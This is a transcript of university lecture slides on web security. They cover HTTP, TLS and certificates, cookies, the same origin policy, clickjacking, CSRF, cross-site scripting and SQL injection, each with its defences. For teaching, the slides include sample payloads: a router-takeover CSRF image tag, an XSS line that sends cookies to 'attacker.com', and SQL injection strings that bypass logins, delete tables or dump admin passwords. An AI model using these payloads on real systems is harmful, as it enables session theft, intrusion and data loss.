cit 480: securing computer systemswaldenj/classes/2016/spring/cit480/... · – trusted copy of tls...
TRANSCRIPT
CIT 480: Securing Computer
Systems
Web Security
Topics
1. HTTP
2. Transport Layer Security (TLS)
3. URLs
4. HTML and the DOM
5. Same Origin Policy
6. Cross-Site Attacks
7. SQL Injection
Web Transactions
Web Browser
OS
Web Server
Network
HTTP: HyperText Transfer Protocol
Simple request/respond protocol
– Request methods: GET, POST, HEAD, etc.
– Protocol versions: 0.9, 1.0, 1.1, 2.0
Stateless
– Each request independent of previous requests, i.e.
request #2 doesn’t know you authenticated in #1.
– Version 2.0 (2015) does not change methods or
headers, but is binary rather than text and supports
faster networking.
HTTP GET Request
GET http://www.google.com/ HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7
Accept: text/html, image/png, */*
Accept-Language: en-us,en;q=0.5
Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4
Method URL Protocol Version
Headers
Blank Line
No Data for GET method
HTTP POST Request
POST http://www.example.com/ HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2) Gecko/20100101 Firefox/35.0
Accept: text/html, image/png, */*
Accept-Language: en-us,en;q=0.5
Method URL Protocol Version
Headers
Blank Line
POST data
name=Jane+Doe&sex=female&color=green&over6feet=true&over200pounds=false&athleticability=NA
HTTP Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Fri, 13 Oct 2006 03:16:30 GMT
<HTML> ... (page data) ... </HTML>
Protocol Version HTTP Response Code
Headers
Blank
Line
Web Page Data
HTTP Methods
Method Description
GET Retrieve resource located at specified URI.
HEAD Retrieve metadata about resource located at specified URI. Useful for
caches to determine if they need to retrieve an updated resource.
PUT Create or replace resource located at specified URI with resource provided
by client.
DELETE Delete resource located at specified URI.
OPTIONS Return list of HTTP methods that can be used with specified URI.
POST Create a new resource under the specified URI, e.g. adding a new message
in a web forum, adding a comment to a blog post, annotating a photo, etc.
In summary, POST is a way for a client to create a new resource without
knowing its URI; the client just knows the URI of a “parent” or “factory”
resource.
Transport Layer Security (TLS)
TLS protocol provides security features for
other protocols, such as HTTP, IMAP, etc.
1. Authentication of server to client.
2. Optional authentication of client to server.
3. Confidentiality of communication.
4. Integrity of communication.
TLS 1.0 was published in 1999.
– SSL 2.0 was first released in 1995.
– TLS 1.2 is most recent, defined in 2008.
TLS Operation
TLS Cipher Suites
1. Key Exchange Algorithm
– Used to exchange session keys for bulk encryption algorithm.
– Examples: RSA, Diffie-Hellmann
2. Bulk Encryption Algorithm
– Used to encrypt message stream.
– Examples: RC4-128, Triple-DES, AES-128, AES-256
3. Message Authentication Code
– MAC is keyed hash function to ensure integrity.
– Based on MD5, SHA-1, or SHA-2, key based on master secret.
4. Pseudorandom Function
– Used to create master secret, a 48-byte shared session key.
– Based on HMAC version of hash function w/ pre-master secret.
TLS Cipher Suites
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
– DHE is the Key Exchange Algorithm
– RSA for Authentication (digital signatures)
– AES is the Bulk Encryption Algorithm
– 128 is the length of the keys
– CBC is the mode used for the BEA.
– SHA is the MAC algorithm used for HMAC.
Key Size and Security
Protection Symmetric Public
Key
Diffie-
Hellman
Elliptic
Curve
Hash
Short term against small
organizations
64 816 816 128 128
Very short term against
agencies
80 1248 1248 160 160
Short term against agencies
(10 years)
96 1776 1776 192 192
Medium term against
agencies (20 years)
112 2432 2432 224 224
Long term protection
(30 years)
128 3248 3248 256 256
Long term protection with
increased defense against
quantum computers.
256 15424 15424 512 512
X.509 Digital Certificates
Certificate contains
– Serial number
– Identity of issuer, who produced certificate.
– Identity of subject.
– Public key of subject.
– Range of dates for which certificate is valid.
– Digital signature from issuer.
Signature means that issuer vouches that
– Public key belongs to subject, e.g.
– You really are connected to example.com.
Client has list of trusted certificate authorities (CAs)
– Client will trust certificate if it is signed by one of those CAs or if issuer
has a certificate that was signed by CA.
How Clients Use Certificates
X.509 Certificate Validation
http://www.zytrax.com/tech/survival/chain.gif
Certificate Authorities
CA is an entity that issues digital certificates.
– Trusted 3rd party that enables public key cryptography.
– Root CA certificates embedded in browser or OS.
– Hundreds of CAs exist in dozens of countries.
Obtaining a Certificate
1. Create a public/private key pair.
– Choose appropriate algorithm and key size.
2. Create Certificate Signing Request (CSR)
– Contains public key and identity information.
– Sign CSR with applicant’s private key.
3. Send CSR to CA.
4. CA validates CSR.
– Checks that applicant matches identity.
5. CA sends certificate to applicant.
Certificate Issuance Validation
Domain Validation (DV)
– CA sends token via e-mail to technical contact from
domain registration or postmaster@domain.
– Validation complete if certificate requester returns token.
– Cost is low or even free.
Extended Validation (EV)
– Known procedure verifies legal entity who controls site.
– Guidelines: https://cabforum.org/extended-validation/
– CAs must pass a qualified audit to issue EV certificates.
– Cost is significantly higher.
– Browser UI indicates EV with location bar color.
Certificate Revocation
Certificates are revoked when
– Private key is compromised or no longer in use.
– Certificate was issued to wrong entity (faulty validation).
Certificate Revocation List (CRL)
– List of serial numbers of revoked certificates that have not yet
expired.
– Can be large, so lookup can be slow.
Online Certificate Status Protocol (OCSP)
– Check revocation status of a single certificate.
– CA specifies their OCSP servers in issued certificates.
Revocation Problems
Revocation is slow
– Revocation status data is valid for 10 days.
Revocation is a blacklist technology
– CRLs were designed as a blacklist.
– OCSP was implemented as a blacklist, using CRL data and
interpreting no response as not revoked.
Libraries and command line tools don’t check
– Default configuration is not to check for revocation.
OCSP leaks information about browsing habits
– Monitor small # of OCSP servers vs entire Internet.
– OCSP stapling fixes by allowing servers to do OCSP.
PKI Incidents
2001: VeriSign tricked into issuing two code-signing certificates to
someone claiming to represent Microsoft. Certificates not trusted by
Windows, but GUI asks user to accept certificate from Microsoft.
2008: Security researcher Mike Zusman obtained certificate for
login.live.com by using a personal live.com e-mail address,
2008: CertStar (a Comodo branch) is found to issue certificates
without any domain name validation. Tester got mozilla.org cert.
2011: Comodo resellers issue certificates for login. yahoo.com,
mail.google.com, login.skype.com, etc.
2011: Dutch CA DigiNotar totally compromised; hundreds of
certificates issue, including *.*.com and *.*.org. Could not revoke
because did not know which certificates issued. Company’s root
certificates were revoked and DigitNotar declared bankruptcy.
Certificate Pinning
Browser checks certificate against
– Trusted copy of TLS certificate or public key stored in
browser.
– Successfully detected ANSSI (French infosec agency)
MITM attacks using unauthorized Google certs in 2013.
Pinned certificates are created by
– Preloading (Chrome comes with *.google pins).
– Loading on first connection to site.
Pinned certificates can expire based on
– Public-Key-Pins HTTP header max-age field.
– Certificate expiration date.
HTTPS (HTTP over SSL)
HTTPS differences
– Default port is 443.
– Connection: close HTTP header ends session.
– RFC 2818: HTTP over TLS
Encrypts
– URL of requested document
– HTTP headers
– HTTP bodies, including response documents
– All form parameters, as they are either in the URL or
the HTTP body.
TLS Attacks
Version and renegotiation attacks
– Trick browser into using insecure SSL or cipher version.
Man-in-the-middle (MITM) attacks
– Sslsniff, but will produce certificate warnings.
– Sslstrip converts https links to http links, so user
communicates in plaintext with middleman.
Implementation attacks
– Heartbleed(2014): OpenSSL memory reading attack.
– Apple goto fail (2014): Allows read or modify TLS data.
HSTS
HTTP Strict Transport Security (HSTS)
– Plaintext URLs rewritten to use TLS.
– All certificate errors treated as fatal.
Web sites support by using header
– Strict-Transport-Security: max-age; includeSubDomains
Browsers (all except IE) support by
– Accepting header.
– Preloading list of HSTS sites.
Protects against SSLstrip attacks, as long as HSTS
header is not stripped in browser’s 1st connection to site.
URL Format
<proto>://<user:pw>@<host>:<port>/<path>?<qstr>#<frag>
– Proto is the network protocol, e.g. http, ftp, mailto, etc.
– User and pw are optional authentication credentials.
– Host is the DNS name or IP address of the server.
– Port is the TCP port number; defaults to 80 for http.
– Path is the name of the resource on the server, which may or may not represent a filesystem path.
– Qstr is a query string typically used by GET requests to send parameters to an application.
– Frag is a fragment identifier used by the client to identify a location within a web page. It is not sent to the server. Some client apps use fragments for navigation, so their contents may be security sensitive.
URL Encoding
<proto>://<user:pw>@<host>:<port>/<path>?<qstr>#<frag>
– Query string is set of key=value pairs separated by &
• ?q=cloud&lang=en
– Whitespace marks end of URL
– Special characters must be URL-encoded.
• %HH represents character with hex values, e.g. %20 = space.
• Special characters include whitespace : @ ? / # &
• Any character may be encoded, including proto, path, etc.
– URL encoding is also used in the body of POST requests.
http://user:[email protected]:8001/a%20spaced%20path?l=en#section2
IDN Homograph Attacks
• International Domain Names
– Use chars from different langs via Punycode.
• Punycode represents Unicode as ASCII.
– Represent Unicode numbers via ASCII.
– Punycode domain names begin with xn--.
– Some TLDs limit use of Punycode by language.
• Homographs
– Characters in different alphabets with identical
appearances, such as “a” in Latin and Cyrillic.
– http://www.xn--pypal-4ve.com/ displays as
www.paypal.com in browser.
– Modern browsers warn about suspicious IDNs.
URL Examples
http://example.com/
http://[email protected]/
http://example.com:8080/test/path.html
http://example.com/search?q=foo&l=en
http://example.com/index.html#section2
http://%65xample.%63om/
http://example.com&g=1234@167772161/
Forced Browsing
An attack designed to enumerate and access
URLs that are not referenced by accessible
pages but which are still accessible.
– If you have www.example.com/users/3/personal
– Try www.example.com/users/4/personal
Tools use wordlists to find likely URLs:
– DirBuster (dirb http://127.0.0.1/)
– Nikto (nikto –h http://127.0.0.1/)
HTTP is a stateless protocol
A stateful protocol allows requests to move the server into a different state, in which a request may produce a different result.
– Example protocols: FTP, SMTP, TCP
– FTP command “get rest.txt” will return a different file when cwd is /public rather than /private.
A stateless protocol treats each request as an independent transaction that is unrelated to any previous request so that communication consists of independent pairs of requests and responses.
– Examples: HTTP, IP
Handling Statelessness
Store state information directly in the address (URI)
– To access second page in google search for “http”:
– https://encrypted.google.com/webhp? q=http&safe=off&start=10
– Works best for web services.
Store state indirectly in an HTTP header (cookies)
– Set-Cookie header from server creates cookie.
– Client must return Cookie HTTP header with each subsequent request if it wants the server to remember its state.
– Cookie is a pointer to state stored on the server.
– Example: most shopping cart applications.
HTML
<html>
<head>
<title>This is a title</title>
</head>
<body>
<p class=“only”>Hello world!</p>
<img src=“images/hello.png” />
</body>
</html>
HTML Special Characters
< begins a tag
> ends a tag
some browsers will auto-insert matching <
‘ and “ enclosed attributes
optional unless spaces or other meaningful chars.
& begins an HTML entity
entities used to represent special characters.
HTML Entities
Entities can encode any Unicode character.
Reference UCS code point via the notation:
&#nnnn; (decimal) or &#xhhhh; (hexadecimal)
Some common entities have names.
¢ → ¢
Special characters must be encoded as entities:
& → &
< → <
> → >
" → "
' → '
HTML Forms
<form> tag
– action=URL destination
for form input.
– method=get sends input as
query string parameters
– method=post sends input
as data in POST method
<input> tag
– name=name of input.
– type attribute specifies
checkbox, radio, text, etc.
HTTP Form Submission
POST http://www.example.com/ HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7
Accept: text/html, image/png, */*
Accept-Language: en-us,en;q=0.5
Method URL Protocol Version
Headers
Blank Line
POST data
name=Jane+Doe&sex=female&color=green&over6feet=true&over200pounds=false&athleticability=NA
Document Object Model (DOM)
• DOM connects
JavaScript and CSS to
HTML documents.
• JavaScript can read
and modify every
element of HTML.
• Dynamic HTML
(DHTML) = DOM +
JavaScript + CSS.
• Capability used by
threats in cross-site
scripting attacks.
XMLHttpRequest (XHR) API
JavaScript API to request data from server.
– Without loading a new web page in browser.
– Can be done asynchronously so web application
UI responsive during loads.
– Resources typically XML or JSON data.
Allows highly interactive web applications
– AJAX = Asynchronous JavaScript and XML
– Examples: Google Maps, Gmail, etc.
– Can only request resources from server that
JavaScript came from (Same Origin Policy.)
DHTML vs. Ajax
Cookies
Maintain state via HTTP headers
– State specified is set of name=value pairs.
– Set-Cookie header sent from server.
– Cookie header sent from browser.
– No RFC specification used til RFC 6265 in 2011.
Examples
– Set-Cookie: foo=bar; path=/; expires Fri, 20-Feb-2015
23:59:00 GMT
– Cookie: foo=bar
Encoding
– Encode cookies with base64 to avoid metacharacter
interpretation (colons, commas, slashes, quotes, etc.)
Cookie Fields
Expires: if specified, cookie may be saved to disk and persist
across sessions. If not, then cookie persists for duration of
browser session.
Max-age: similar to Expires, but not supported by IE.
Domain: scoping mechanism to allow cookie to be scoped to
domain broader than host that sent Set-Cookie header.
Path: scopes cookie to a specified path prefix.
Secure: prevents cookie from being sent over non-encrypted
connections.
HttpOnly: removes ability to read cookie via
document.cookie API in JavaScript to protect against XSS.
Cookie Security Policy
Domain parameter limits which servers are sent
cookie in complex ways (see table).
Path parameter limits which paths are sent cookies,
but JavaScript from any path can read cookies.
Browser Storage
• Why aren’t cookies enough?
– Performance hit: included with every HTTP request.
– Limited to about 4KB in size.
• Flash storage
– Local Stored Objects (LSOs) 100KB per domain.
– Client can request more storage with user approval.
• Web Storage (aka DOM Storage)
– Standard supported by all browsers.
– Key/value storage in string format.
– 5MB of storage per origin.
• WebSQL exists but is not supported by IE or FF.
Same Origin Policy (SOP)
Goal: prevent web pages of different origins from
accessing each others’ data, such as cookies, hidden
fields, web local storage, etc.
Origin = scheme, hostname, and port.
Example: Scripts from evil.com should not be able
to access data from example.com.
Cross-Site Attacks
Target users of application.
– Use application feature to reach other users of
application, bypassing same origin policy.
– Obtain assets of individual users rather than
assets of entire application.
One of the most common types of attack.
– Clickjacking
– Cross-Site Request Forgery (CSRF)
– Cross-Site Scripting (XSS)
Clickjacking
• Any page can embed
any other page inside a
frame.
• Malicious pages can
hide that fact by
overlaying display
elements.
• Clicks in frame are
delivered to embedded
application with cached
credentials. The Tangled Web
Clickjacking Defences
• X-Frame-Options header
– DENY: prevent any site from framing content
– SAMEORIGIN: only same origin can frame.
– ALLOW-FROM: only specified URL can frame.
• CSP2 frame-ancestors directive
– Same capabilities using CSP directives.
• Frame breaking scripts
– Classic frame breaking
• if(top != self) top.location.replace(location);
– Malicious sites can stop, so frame breaking evolves.
– Frame sandboxing can stop any frame breaking.
Cross-Site Request Forgery
A confused deputy attack.
– Exploits trust that application has with authentication sessions.
Attack scenario:
– User authenticates to web application.
– User browses to another site containing a malicious CSRF attack link to web app.
• iframe, img, link, bgsound, etc.
– Browser accesses web app with cached credentials, performing whatever action specified by the link.
Example: DSL Modem Attack
Home network devices are administered via web apps.
– Standard local IPs.
Attacker inserts 1-pixel imgtag on page.
– src is URL of form submission, giving remote admin.
No password needed.
– Software owner assumed device on trusted local network.
– Of course, browser is on the local network too.
<img
src="http://192.168.1.254/Forms/remoteRES_1?NSS_RemotePas
sword=blehblah&NSS_EnableWANAdminAccessRES=on&time
outDisable=0&Enable=Enable" alt="" width="1" height="1" />
Mitigating CSRF
Require POST for data modifications, but
– Many frameworks automatically fetch both types of parameters or convert one to other.
– Hidden POST requests can be created with scripts.
Check referer header.
– But users can block or forge referer header, so it cannot be relied on for everyone.
Use nonces.
– Random token inserted as hidden parameter, and thus submitted with form.
– But XSS can read form, so a combined XSS + CSRF attack can bypass this defense.
Mitigating CSRF
Re-authenticate for high value transactions.
– Use out of band authentication if possible.
Expire session IDs quickly.
– But there will always be some time period in which
a CSRF attack will work.
Automate defenses with tools.
– CSRFGuard to insert nonces.
– CSRFTester to verify application.
Cross-Site Scripting (XSS)
Attacker causes a legitimate web server to send
user executable content (Javascript, Flash
ActiveScript) of attacker’s choosing.
Impact of XSS
– Account hijacking.
– Browser hijacking (malware hosting.)
– Information leakage (stored form values, etc.)
– Virtual defacement.
XSS Example
Web application sends browser to an error
page after user clicks submit.
https://example.com/error.php?message=So
rry%2C+an +error+occurred
XSS Example
The error message is “reflected” back from
the Web server to the client in a web page.
XSS Example
We can replace the error with JavaScript
https://example.com/error.php?message=<scri
pt>alert(‘xss’);</script>
Exploiting the Example
1. User logins in and is issued a cookie
2. Attacker feed the URL to user
https://example.com/error.php?message=<scri
pt>var+i=new+Image;+i.src=“http://attack
er.com/”%2bdocument.cookie;</script>
Why does XSS Work?
Same-Origin Policy
– Browser only allows Javascript from site X to
access cookies and other data from site X.
– Attacker needs to make attack come from site X.
Vulnerable Server Program
– Any program that returns user input without
filtering out dangerous code.
Reflected XSS
Attack Scenario
– User clicks on link.
– Injected script returned by one-time message
from vulnerable site.
– User browser executes injected code.
Limitations
– Non-persistent. Only works when user clicks.
– Most common type of XSS (~75%).
Anatomy of an XSS Attack
Web Server
3. XSS Attack
AttackerUser
4. User clicks on XSS link.
7. Browser runs
injected code.
Evil site saves ID.
XSS URL Examples
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Stored XSS
Injected script stored in
– Post or comment.
– Review.
– Uploaded file.
User views page with injected script.
– Malicious action is taken while user is logged into
site where malware found.
– Not technically cross-site.
Attack persists until injected code deleted.
Browser Exploitation Framework
BeEF hooks browsers via XSS exploit
– Can use as stored or reflected XSS.
– Hooked browsers are bots controlled by BeEF.
Exploitation modules run on hooked browsers to
– View browsing history.
– Identify authenticated sessions.
– Phishing and other social engineering attacks.
– Port scans of network browser is running on.
– Reverse proxy into network browser is running on.
– Use Metasploit.
BeEF Screenshot
Mitigating XSS
1. Disallow HTML input
2. Allow only safe HTML tags
3. Encode output
Replace HTML special characters in outputex: replace < with < and > with >
also replace (, ), #, &
4. Re-authenticate for important transactions to limit exposure to account hijacking.
5. Content Security Policy (CSP)
Content Security Policy (CSP)
Server provides header which tells browser to
– Disable inline JavaScript (can re-enable with unsafe-inline)
– Disable dynamic code evaluation.
– Permit JS inclusion only from a white list of sources.
Prevents XSS if
– Application architected to not directly include any
JavaScript via <script> tags or included in other tags.
– CSP configuration is not too permissive.
CSP versions and support
– CSP 1.0 is supported by all browsers since 2013 except IE.
– CSP 1.1 in standardization; CSP 2 working draft in 2014.
CSP HTTP Headers
Each URL must send its own CSP header.
CSP header Example:
Content-Security-Policy: default-src ‘self’;
img-src *;
object-src *.cdn.example.com;
script-src scripts.example.com
SQL Injection
Fir
ewal
l
Hardened OS
Web Server
App Server
Fir
ewal
l
Dat
abas
es
Leg
acy S
yst
ems
Web
Ser
vic
es
Dir
ecto
ries
Hum
an R
esrc
s
Bil
ling
Custom Code
APPLICATION
ATTACK
Net
wo
rk L
ayer
Ap
pli
cati
on L
ayer
Acc
ounts
Fin
ance
Ad
min
istr
atio
n
Tra
nsa
ctio
ns
Co
mm
unic
atio
n
Kno
wle
dge
Mgm
t
E-C
om
mer
ce
Bus.
Funct
ions
HTTP
request
SQL
query
DB Table
HTTP
response
"SELECT *
FROM
accounts
WHERE
acct=‘’ OR
1=1--’"1. Application presents a form to the attacker.
2. Attacker sends an attack in the form data.
3. Application forwards attack to the database in a SQL query.
Account Summary
Acct:5424-6066-2134-4334
Acct:4128-7574-3921-0192
Acct:5424-9383-2039-4029
Acct:4128-0004-1234-0293
4. Database runs query containing attack and sends encrypted results back to application.
5. Application decrypts data as normal and sends results to the user.
Account:
SKU:
Account:
SKU:
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME,
$DB_PASSWORD) or die ("Couldn't connect: " .
mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username =
'$username' and password = '$password'";
$result = mysql_query($query);
SQL Injection Attack #1
Unauthorized Access Attempt:
password = ’ or 1=1 --
SQL statement becomes:
select count(*) from users where username =
‘user’ and password = ‘’ or 1=1 --
Checks if password is empty OR 1=1, which is
always true, permitting access.
SQL Injection Attack #2
Database Modification Attack:password = foo’; delete from table users where
username like ‘%
DB executes two SQL statements:select count(*) from users where username = ‘user’ and
password = ‘foo’
delete from table users where username like ‘%’
Exploits of a Mom
http://www.xkcd.com/327/
Finding SQL Injection Bugs
1. Submit a single quote as input.
If an error results, app is vulnerable.
If no error, check for any output changes.
2. Submit two single quotes.
Databases use ’’ to represent literal ’
If error disappears, app is vulnerable.
3. Try string or numeric operators.
Oracle: ’||’FOO
MS-SQL: ‘+’FOO
MySQL: ’ ’FOO
2-2
81+19
49-ASCII(1)
SQLi Example
www.website.com/fullnews.php?id=-
1/**/UNION/**/ALL/**/SELECT/**/1,2,con
cat(username,char(58),password),4,5/**/FRO
M/**/admin/*
Exploit against http://phprealestatescript.com/
Prevention: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
die($mdb2->getMessage());
}
$sql = “SELECT count(*) from users where username = ? and password = ?”;
$types = array('text', 'text');
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP);
$data = array($username, $password);
$sth->execute($data);
Key Points
1. Key features of the web
– Understand features and risks of HTTP, HTML, DOM
2. HTTPS = HTTP + TLS
– Authentication of server via certificate.
– Confidentiality + integrity of data in transit.
– Input-based attacks like XSS, SQLi can be delivered via SSL.
3. Same Origin Policy (SOP)
– Prevents web sites from accessing data from other sites.
– Protects cookies, headers, form parameters, etc.
4. Cross-site Attacks
– Bypass SOP by tricking vulnerable web application and user.
5. SQL Injection
– Add user data to program SQL code to craft attack.
– Prevent by using prepared queries.
References
1. Andreu, Professional Penetration Testing for Web Applications, Wrox, 2006.
2. Goodrich and Tammasia, Introduction to Computer Security, Pearson, 2011.
3. Ivan Ristic, Bulletproof SSL and TLS, Feisty Duck, 2014.
4. Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, McGraw-Hill, 2006.
5. Sarkar and Fitzgerald, Attacks on SSL: A comprehensive study of BEAST, CRIME, TIME, BREACH, LUCKY 13, and RC4 biases, https://www.isecpartners.com/media/106031/ssl_attacks_survey.pdf, 2013.
6. Stuttart and Pinto, The Web Application Hacker’s Handbook, 2nd ed, Wiley, 2011.
7. Michal Zalewski, The Tangled Web: A Guide to Securing Modern Web Applications, No Starch Press, 2012.
8. Kim Zetter, Heartbleed Bug Sends Bandwidth Costs Skyrocketing. Wired. http://www.wired.com/2014/04/cost-of-heartbleed/, Apr 2014.
Released under CC BY-SA 3.0
This presentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license
You are free: to Share — to copy and redistribute the material in any medium to Adapt— to remix, build, and transform upon the material to use part or all of this presentation in your own classes
Under the following conditions: Attribution — You must attribute the work to James Walden, but
cannot do so in a way that suggests that he endorses you or your use of these materials.
Share Alike — If you remix, transform, or build upon this material, you must distribute the resulting work under this or a similar open license.
Details and full text of the license can be found at https://creativecommons.org/licenses/by-nc-sa/3.0/